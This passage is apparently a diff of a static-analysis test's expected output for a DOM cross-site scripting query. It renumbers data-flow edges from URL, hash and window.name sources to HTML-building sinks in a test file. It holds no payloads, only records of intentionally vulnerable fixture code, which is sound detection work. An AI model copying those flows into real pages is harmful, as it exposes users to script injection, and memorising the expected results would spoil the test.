@@ -973,217 +973,217 @@ edges | tst3.js:7:32:7:35 | data | tst3.js:7:32:7:37 | data.p | provenance | | | tst3.js:9:37:9:40 | data | tst3.js:9:37:9:42 | data.p | provenance | | | tst3.js:10:38:10:41 | data | tst3.js:10:38:10:43 | data.p | provenance | | -| tst.js:2:7:2:39 | target | tst.js:5:18:5:23 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:12:28:12:33 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:20:42:20:47 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:4:18:4:23 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:9:28:9:33 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:17:42:17:47 | target | provenance | | | tst.js:2:16:2:39 | documen ... .search | tst.js:2:7:2:39 | target | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | Config | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | Config | -| tst.js:12:28:12:33 | target | tst.js:12:5:12:42 | '
    ' | provenance | Config | -| tst.js:17:7:17:56 | params | tst.js:18:18:18:23 | params | provenance | | -| tst.js:17:7:17:56 | params [MapValue] | tst.js:18:18:18:23 | params [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | tst.js:17:16:17:56 | (new UR ... hParams | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams | tst.js:17:7:17:56 | params | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | tst.js:17:7:17:56 | params [MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams] | provenance | | -| tst.js:18:18:18:23 | params | tst.js:18:18:18:35 | params.get('name') | provenance | Config | -| tst.js:18:18:18:23 | params [MapValue] | tst.js:18:18:18:35 | params.get('name') | provenance | | -| tst.js:20:7:20:61 | searchParams | tst.js:21:18:21:29 | searchParams | provenance | | -| tst.js:20:7:20:61 | searchParams [MapValue] | tst.js:21:18:21:29 | searchParams [MapValue] | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) | tst.js:20:7:20:61 | searchParams | provenance | | -| tst.js:20:22:20:61 | new URL ... 
ing(1)) [MapValue] | tst.js:20:7:20:61 | searchParams [MapValue] | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:21:18:21:29 | searchParams | tst.js:21:18:21:41 | searchP ... 'name') | provenance | Config | -| tst.js:21:18:21:29 | searchParams [MapValue] | tst.js:21:18:21:41 | searchP ... 'name') | provenance | | -| tst.js:24:14:24:19 | target | tst.js:26:18:26:23 | target | provenance | | -| tst.js:28:5:28:28 | documen ... .search | tst.js:24:14:24:19 | target | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:58:26:58:30 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | provenance | | -| tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | Config | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | Config | -| tst.js:48:15:48:15 | s | tst.js:50:12:50:12 | s | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | Config | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... 
search) | provenance | Config | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | Config | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | Config | -| tst.js:60:34:60:34 | s | tst.js:62:18:62:18 | s | provenance | | -| tst.js:64:25:64:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:65:25:65:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:70:1:70:27 | [,docum ... search] [1] | tst.js:70:46:70:46 | x | provenance | | -| tst.js:70:3:70:26 | documen ... .search | tst.js:70:1:70:27 | [,docum ... search] [1] | provenance | | -| tst.js:70:46:70:46 | x | tst.js:73:20:73:20 | x | provenance | | -| tst.js:107:7:107:44 | v | tst.js:110:18:110:18 | v | provenance | | -| tst.js:107:7:107:44 | v | tst.js:136:18:136:18 | v | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | Config | -| tst.js:107:11:107:44 | documen ... bstr(1) | tst.js:107:7:107:44 | v | provenance | | -| tst.js:148:29:148:50 | window. ... .search | tst.js:151:29:151:29 | v | provenance | | -| tst.js:151:29:151:29 | v | tst.js:151:49:151:49 | v | provenance | | -| tst.js:158:40:158:61 | window. ... 
.search | tst.js:155:29:155:46 | xssSourceService() | provenance | | -| tst.js:177:9:177:41 | target | tst.js:180:28:180:33 | target | provenance | | -| tst.js:177:18:177:41 | documen ... .search | tst.js:177:9:177:41 | target | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:186:31:186:37 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:188:42:188:48 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:189:33:189:39 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:191:54:191:60 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:192:45:192:51 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:193:49:193:55 | tainted | provenance | | -| tst.js:184:19:184:42 | documen ... .search | tst.js:184:9:184:42 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:199:67:199:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:197:19:197:42 | documen ... 
.search | tst.js:197:9:197:42 | tainted | provenance | | -| tst.js:199:67:199:73 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:204:35:204:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:206:46:206:52 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:207:38:207:44 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:208:35:208:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:204:35:204:41 | tainted | tst.js:212:28:212:46 | this.state.tainted1 | provenance | | -| tst.js:206:46:206:52 | tainted | tst.js:213:28:213:46 | this.state.tainted2 | provenance | | -| tst.js:207:38:207:44 | tainted | tst.js:214:28:214:46 | this.state.tainted3 | provenance | | -| tst.js:208:35:208:41 | tainted | tst.js:218:32:218:49 | prevState.tainted4 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:225:28:225:46 | this.props.tainted1 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:226:28:226:46 | this.props.tainted2 | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:227:28:227:46 | this.props.tainted3 | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:231:32:231:49 | prevProps.tainted4 | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:247:39:247:55 | props.propTainted | tst.js:251:60:251:82 | this.st ... 
Tainted | provenance | | -| tst.js:255:23:255:29 | tainted | tst.js:247:39:247:55 | props.propTainted | provenance | | -| tst.js:285:9:285:29 | tainted | tst.js:288:59:288:65 | tainted | provenance | | -| tst.js:285:19:285:29 | window.name | tst.js:285:9:285:29 | tainted | provenance | | -| tst.js:301:9:301:16 | location | tst.js:302:10:302:10 | e | provenance | | -| tst.js:302:10:302:10 | e | tst.js:303:20:303:20 | e | provenance | | -| tst.js:308:10:308:17 | location | tst.js:310:10:310:10 | e | provenance | | -| tst.js:310:10:310:10 | e | tst.js:311:20:311:20 | e | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams] | provenance | | -| tst.js:331:7:331:43 | params | tst.js:332:18:332:23 | params | provenance | | -| tst.js:331:7:331:43 | params [MapValue] | tst.js:332:18:332:23 | params [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:331:16:331:43 | getTain ... hParams [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | tst.js:331:16:331:43 | getTain ... hParams | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams | tst.js:331:7:331:43 | params | provenance | | -| tst.js:331:16:331:43 | getTain ... 
hParams [MapValue] | tst.js:331:7:331:43 | params [MapValue] | provenance | | -| tst.js:332:18:332:23 | params | tst.js:332:18:332:35 | params.get('name') | provenance | Config | -| tst.js:332:18:332:23 | params [MapValue] | tst.js:332:18:332:35 | params.get('name') | provenance | | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | tst.js:343:5:343:12 | getUrl() [hash] | provenance | | -| tst.js:341:20:341:36 | document.location | tst.js:341:12:341:37 | new URL ... cation) [hash] | provenance | | -| tst.js:343:5:343:12 | getUrl() [hash] | tst.js:343:5:343:17 | getUrl().hash | provenance | | -| tst.js:343:5:343:17 | getUrl().hash | tst.js:343:5:343:30 | getUrl( ... ring(1) | provenance | Config | -| tst.js:348:7:348:39 | target | tst.js:349:12:349:17 | target | provenance | | -| tst.js:348:16:348:39 | documen ... .search | tst.js:348:7:348:39 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:356:16:356:21 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:355:19:355:42 | documen ... .search | tst.js:355:10:355:42 | target | provenance | | -| tst.js:356:16:356:21 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:360:21:360:26 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:363:18:363:23 | target | provenance | | -| tst.js:371:7:371:39 | target | tst.js:374:18:374:23 | target | provenance | | -| tst.js:371:16:371:39 | documen ... 
.search | tst.js:371:7:371:39 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:384:18:384:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:386:18:386:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:397:18:397:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:406:18:406:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:408:19:408:24 | target | provenance | | -| tst.js:381:16:381:39 | documen ... .search | tst.js:381:7:381:39 | target | provenance | | -| tst.js:386:18:386:23 | target | tst.js:386:18:386:29 | target.taint | provenance | | -| tst.js:391:3:391:8 | [post update] target [taint3] | tst.js:392:18:392:23 | target [taint3] | provenance | | -| tst.js:391:19:391:42 | documen ... .search | tst.js:391:3:391:8 | [post update] target [taint3] | provenance | | -| tst.js:392:18:392:23 | target [taint3] | tst.js:392:18:392:30 | target.taint3 | provenance | | -| tst.js:397:18:397:23 | target | tst.js:397:18:397:30 | target.taint5 | provenance | | -| tst.js:406:18:406:23 | target | tst.js:406:18:406:30 | target.taint7 | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:408:19:408:24 | target [taint8] | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:409:18:409:23 | target [taint8] | provenance | | -| tst.js:408:19:408:24 | target | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:24 | target [taint8] | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:31 | target.taint8 | tst.js:408:3:408:8 | [post update] target [taint8] | provenance | | -| tst.js:409:18:409:23 | target [taint8] | tst.js:409:18:409:30 | target.taint8 | provenance | | -| tst.js:416:7:416:46 | payload | tst.js:417:18:417:24 | payload | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... 
bstr(1) | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | Config | -| tst.js:416:17:416:46 | window. ... bstr(1) | tst.js:416:7:416:46 | payload | provenance | | -| tst.js:419:7:419:55 | match | tst.js:421:20:421:24 | match | provenance | | -| tst.js:419:15:419:34 | window.location.hash | tst.js:419:15:419:55 | window. ... (\\w+)/) | provenance | | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | tst.js:419:7:419:55 | match | provenance | | -| tst.js:421:20:421:24 | match | tst.js:421:20:421:27 | match[1] | provenance | | -| tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:48 | window. ... it('#') [1] | provenance | Config | -| tst.js:424:18:424:48 | window. ... it('#') [1] | tst.js:424:18:424:51 | window. ... '#')[1] | provenance | | -| tst.js:428:7:428:39 | target | tst.js:430:18:430:23 | target | provenance | | -| tst.js:428:16:428:39 | documen ... .search | tst.js:428:7:428:39 | target | provenance | | -| tst.js:430:18:430:23 | target | tst.js:430:18:430:89 | target. ... data>') | provenance | | -| tst.js:436:6:436:38 | source | tst.js:440:28:440:33 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:441:33:441:38 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:442:34:442:39 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:443:41:443:46 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:444:44:444:49 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:445:32:445:37 | source | provenance | | -| tst.js:436:15:436:38 | documen ... .search | tst.js:436:6:436:38 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:455:18:455:23 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:456:36:456:41 | source | provenance | | -| tst.js:453:16:453:39 | documen ... 
.search | tst.js:453:7:453:39 | source | provenance | | -| tst.js:456:36:456:41 | source | tst.js:456:18:456:42 | ansiToH ... source) | provenance | | -| tst.js:460:6:460:38 | source | tst.js:463:21:463:26 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:465:19:465:24 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:467:20:467:25 | source | provenance | | -| tst.js:460:15:460:38 | documen ... .search | tst.js:460:6:460:38 | source | provenance | | -| tst.js:471:7:471:46 | url | tst.js:473:19:473:21 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:474:26:474:28 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:475:25:475:27 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:476:20:476:22 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:486:22:486:24 | url | provenance | | -| tst.js:471:13:471:36 | documen ... .search | tst.js:471:13:471:46 | documen ... bstr(1) | provenance | Config | -| tst.js:471:13:471:46 | documen ... bstr(1) | tst.js:471:7:471:46 | url | provenance | | -| tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | provenance | Config | -| tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | provenance | Config | -| tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | provenance | | -| tst.js:508:7:508:39 | target | tst.js:509:18:509:23 | target | provenance | | -| tst.js:508:16:508:39 | documen ... .search | tst.js:508:7:508:39 | target | provenance | | -| tst.js:509:18:509:23 | target | tst.js:509:18:509:54 | target. ... "), '') | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | Config | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... 
t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | Config | +| tst.js:9:28:9:33 | target | tst.js:9:5:9:42 | '
    ' | provenance | Config | +| tst.js:14:7:14:56 | params | tst.js:15:18:15:23 | params | provenance | | +| tst.js:14:7:14:56 | params [MapValue] | tst.js:15:18:15:23 | params [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | tst.js:14:16:14:56 | (new UR ... hParams | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams | tst.js:14:7:14:56 | params | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | tst.js:14:7:14:56 | params [MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams] | provenance | | +| tst.js:15:18:15:23 | params | tst.js:15:18:15:35 | params.get('name') | provenance | Config | +| tst.js:15:18:15:23 | params [MapValue] | tst.js:15:18:15:35 | params.get('name') | provenance | | +| tst.js:17:7:17:61 | searchParams | tst.js:18:18:18:29 | searchParams | provenance | | +| tst.js:17:7:17:61 | searchParams [MapValue] | tst.js:18:18:18:29 | searchParams [MapValue] | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) | tst.js:17:7:17:61 | searchParams | provenance | | +| tst.js:17:22:17:61 | new URL ... 
ing(1)) [MapValue] | tst.js:17:7:17:61 | searchParams [MapValue] | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:18:18:18:29 | searchParams | tst.js:18:18:18:41 | searchP ... 'name') | provenance | Config | +| tst.js:18:18:18:29 | searchParams [MapValue] | tst.js:18:18:18:41 | searchP ... 'name') | provenance | | +| tst.js:21:14:21:19 | target | tst.js:22:18:22:23 | target | provenance | | +| tst.js:24:5:24:28 | documen ... .search | tst.js:21:14:21:19 | target | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:48:26:48:30 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | provenance | | +| tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | Config | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | Config | +| tst.js:41:15:41:15 | s | tst.js:43:12:43:12 | s | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | Config | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... 
search) | provenance | Config | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | Config | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | Config | +| tst.js:50:34:50:34 | s | tst.js:51:18:51:18 | s | provenance | | +| tst.js:53:25:53:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:54:25:54:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:58:1:58:27 | [,docum ... search] [1] | tst.js:58:46:58:46 | x | provenance | | +| tst.js:58:3:58:26 | documen ... .search | tst.js:58:1:58:27 | [,docum ... search] [1] | provenance | | +| tst.js:58:46:58:46 | x | tst.js:60:20:60:20 | x | provenance | | +| tst.js:93:7:93:44 | v | tst.js:95:18:95:18 | v | provenance | | +| tst.js:93:7:93:44 | v | tst.js:120:18:120:18 | v | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | Config | +| tst.js:93:11:93:44 | documen ... bstr(1) | tst.js:93:7:93:44 | v | provenance | | +| tst.js:132:29:132:50 | window. ... .search | tst.js:135:29:135:29 | v | provenance | | +| tst.js:135:29:135:29 | v | tst.js:135:49:135:49 | v | provenance | | +| tst.js:142:40:142:61 | window. ... 
.search | tst.js:139:29:139:46 | xssSourceService() | provenance | | +| tst.js:161:9:161:41 | target | tst.js:164:28:164:33 | target | provenance | | +| tst.js:161:18:161:41 | documen ... .search | tst.js:161:9:161:41 | target | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:170:31:170:37 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:172:42:172:48 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:173:33:173:39 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:175:54:175:60 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:176:45:176:51 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:177:49:177:55 | tainted | provenance | | +| tst.js:168:19:168:42 | documen ... .search | tst.js:168:9:168:42 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:183:67:183:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:181:19:181:42 | documen ... 
